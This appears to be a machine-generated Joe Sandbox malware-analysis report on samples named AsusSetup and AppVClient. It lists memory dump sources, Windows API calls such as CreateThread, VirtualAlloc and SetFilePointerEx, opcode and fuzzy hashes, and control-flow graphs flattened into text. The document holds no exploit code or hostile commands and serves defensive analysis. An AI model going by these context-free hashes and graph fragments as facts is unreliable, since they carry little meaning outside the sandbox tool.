                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2422867632-0

Control-flow Graph (graph not reproduced; API calls labelled on its nodes: CreateThread, CloseHandle)
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0

Control-flow Graph (graph not reproduced; API calls labelled on its nodes: SetFilePointerEx)
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c8a774f80b67d0f7a9aff682db143e676912666a894dd1733a18b9de08e71f15
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2d39fcd5ff8a9e6aa57df03f7ebd9379bdc5d67ce4ae5e7d323f7d283ee36533
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8a774f80b67d0f7a9aff682db143e676912666a894dd1733a18b9de08e71f15
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB41D431A1C74D8FDBBA4A2C885C77E73D1BB85614F084A1E9057C7D90EB358802F752

Control-flow Graph

[Control-flow graph starting at node 318 (2066149); named API nodes: SetFilePointerEx, ReadFile, VirtualAlloc]
APIs
Memory Dump Source
• Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 229127750f2d1745c43f1d4e1443995d50311d9be46bfca75b19e9698ce255bd
• Instruction ID: d156e8ca4c41563d96fdabb348850d9d572b5e74f636aeb042e4b367f769332e
• Opcode Fuzzy Hash: 229127750f2d1745c43f1d4e1443995d50311d9be46bfca75b19e9698ce255bd
• Instruction Fuzzy Hash: 5421F83191CB498AD7A65B28985C33966DCF785329F0C426AD417CA162DF6F8502F382

Control-flow Graph

[Control-flow graph starting at node 357 (2068b33); named API nodes: WriteFile, SetFilePointerEx]
APIs
Memory Dump Source
• Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
Similarity
• API ID: File$PointerWrite
• String ID:
• API String ID: 539440098-0
• Opcode ID: 96d675477f5884ca1f21a6f8044b01c34adb70bd1f4ac458339bad4b2e7f88fe
• Instruction ID: b21e8b6553e46795974f418cbd0263c8cc51ea9ee3ec7bdaea8ef613bb22301b
• Opcode Fuzzy Hash: 96d675477f5884ca1f21a6f8044b01c34adb70bd1f4ac458339bad4b2e7f88fe
• Instruction Fuzzy Hash: C1F0C86061DB054EDBAF9768186C33D36D3DBC9264B0DC11A9557D2241DF35444EF223

Control-flow Graph

[Control-flow graph starting at node 399 (2069180); named API nodes: SetFilePointerEx]
Memory Dump Source
• Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fedb90c313120705c623668376f457cdfd63b1a861b958993c85052519c387b1
• Instruction ID: 3ba4888de5e34b0f247bdab747720d00bb713960e0127bfab41d569d9c6feee8
• Opcode Fuzzy Hash: fedb90c313120705c623668376f457cdfd63b1a861b958993c85052519c387b1
• Instruction Fuzzy Hash: 7A51283050C75E8FCBA74B64889C67E3BE1EB42628F0D416AD857CBDE5DB344506F222

Control-flow Graph

[Control-flow graph starting at node 477 (2068690); named API nodes: SetFilePointerEx]
Memory Dump Source
• Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
Similarity
• API ID:
• String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2738559852-0

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8fb5c28e5d1c9eb1e11ce46e88e0860ba3941c2b0ac46eca638127c2fbbfd38b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5692533eb42e14e2587a994d910d00ea39f57e32788bd5803209c9bcb530baf3
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fb5c28e5d1c9eb1e11ce46e88e0860ba3941c2b0ac46eca638127c2fbbfd38b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F0907592EB1A8ADBFA8B98441D77A73D5FF51264F48C6168C4386114EB30C01CF993

Control-flow Graph
[Graph not preserved in text; API call labelled on its nodes: SetFilePointerEx]
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 412e19964fa084b0320597dc17b3db4847efaffa2005f417fa316b51f5812584
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f5abb326ab5c89d462832d41a12cb577f4c98dc54bd39c8b030a5cdd9b171b28
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 412e19964fa084b0320597dc17b3db4847efaffa2005f417fa316b51f5812584
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44E0921024E3C98EC3538B38684C7F93EF55F02668F08068EB495CA4E2DB3A8809E711

Control-flow Graph
[Graph not preserved in text; API call labelled on its nodes: SetFilePointerEx]
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 835b528c6dcffabb250974905218d0cb35aa061c9c7f48dde8b7e13ad1b7d173
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a95e33520abc4f6833332694003994b99d5276821e6221bc746919f8c5cdc176
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 835b528c6dcffabb250974905218d0cb35aa061c9c7f48dde8b7e13ad1b7d173
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6E04F6090E7885BD7BB5738484C3BD6EE2AB022A4F588546E891C9496CB348C0AE616

Control-flow Graph
[Graph not preserved in text; API calls labelled on its nodes: WriteFile, SetFilePointerEx]
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b63effb34f7ad229d2f8481b85073b53b936557c6f19cf734c30284eb0ff6338
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 72569329deec86259d58cd490f09f991ec866a8fe049b31c5768425421b791e0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b63effb34f7ad229d2f8481b85073b53b936557c6f19cf734c30284eb0ff6338
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DE08C7000C7068FD796CB88D08CB3A7BE2FBC8348F048418A58AC2250CB38818DDB42
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6aa3e1c552310bcbb758a386667589a11fe7fd818f871c106a95b3db2f64f042
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EF0C83451DB538FCAA78718A06C57E6BE0BF81214B5D80CAD447CBD52CB14DD0AF752
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f3e8028455085fd025027e7bfc4fe53a22a415661106f44d2c239a0d29ad07c4
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F0902440D7438FCAF78A14E48C63A27E07F51254B6CC089C447CB962C724DD4DFB52
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 14edfb4d0090b10af77b607882ffd62934590cac436d85568a81f0c3c3664c97
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90F06D64508B438FC6F78A14A48CA3E27E0AF41248B6CD089C447CA962C724DC4EF752
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _clrfp
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3618594692-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: eb89a8a385eca23818c00267d82649db9f1e568ecff9ee33809bd01fc8c9252f
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e986fb20cc6a4b96f13b77a4c75e56c1fa9b5f40b783a2be06cde8f52965c1d5
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb89a8a385eca23818c00267d82649db9f1e568ecff9ee33809bd01fc8c9252f
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2B14630610B4D8FDF9ACF1CC88AB6677E0FB49308B198599E85ACB261C335E852DF41

                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:5.3%
                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:59
                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:5

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 131 535b8f-535c20 call 5453f0 call 568358 call 550320 call 5381c0 141 535c26 131->141 142 535cf4-535d08 call 5672ec 131->142 141->142 144 535c2c-535c2f 141->144 146 535c87-535dc8 call 535e60 call 535990 142->146 147 535d0e 142->147 162 535dcd 146->162 147->146 148 535d14-535d18 147->148 152 535c65 148->152 153 535daf-535db6 call 5352d0 148->153 155 535ca3 call 535df0 152->155 156 535c67 152->156 165 535c30-535c39 153->165 166 535dbc 153->166 171 535c45-535d6d call 551520 155->171 156->155 159 535c69-535c72 156->159 163 535c97-535c9d 159->163 164 535c78 159->164 162->162 183 535c85 163->183 184 535c9f 163->184 172 535d1f-535d45 164->172 173 535c7e 164->173 180 535bf7 165->180 181 535cb9-535cbd 165->181 168 535dbe 166->168 169 535d7d-535d89 166->169 168->169 188 535d9b 168->188 185 535d94 169->185 186 535d8b-535d92 169->186 189 535bfd-535c06 171->189 201 535d73 171->201 194 535d47 172->194 195 535cd4-535cea CreateThread CloseHandle 172->195 173->172 179 535c84-535d5b CreateThread 173->179 179->164 180->181 180->189 192 535cc3 181->192 193 535d56-535d5b CreateThread 181->193 183->146 184->183 196 535ca1 184->196 185->144 199 535cb3 185->199 186->185 197 535d9c 186->197 188->197 205 535da5-535da8 189->205 192->193 200 535cc9 192->200 193->164 194->195 195->186 202 535cf0-535d4d 195->202 196->155 197->205 199->144 199->181 200->193 201->189 206 535d79-535d7b 201->206 202->185 205->153 206->169
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2422867632-0

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 208 535d22-535d45 209 535d47 208->209 210 535cd4-535cea CreateThread CloseHandle 208->210 209->210 211 535cf0-535d4d 210->211 212 535d8b-535d92 210->212 215 535d94 211->215 212->215 216 535d9c 212->216 219 535cb3 215->219 220 535c2c-535c2f 215->220 218 535da5-535db6 call 5352d0 216->218 231 535c30-535c39 218->231 232 535dbc 218->232 219->220 221 535cb9-535cbd 219->221 223 535cc3 221->223 224 535d56-535d5b CreateThread 221->224 223->224 227 535cc9 223->227 225 535c78 224->225 229 535d1f-535d45 225->229 230 535c7e 225->230 227->224 229->209 229->210 230->229 233 535c84-535d5b CreateThread 230->233 231->221 242 535bf7 231->242 235 535dbe 232->235 236 535d7d-535d89 232->236 233->225 235->236 243 535d9b 235->243 236->212 236->215 242->221 244 535bfd-535c06 242->244 243->216 244->218
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

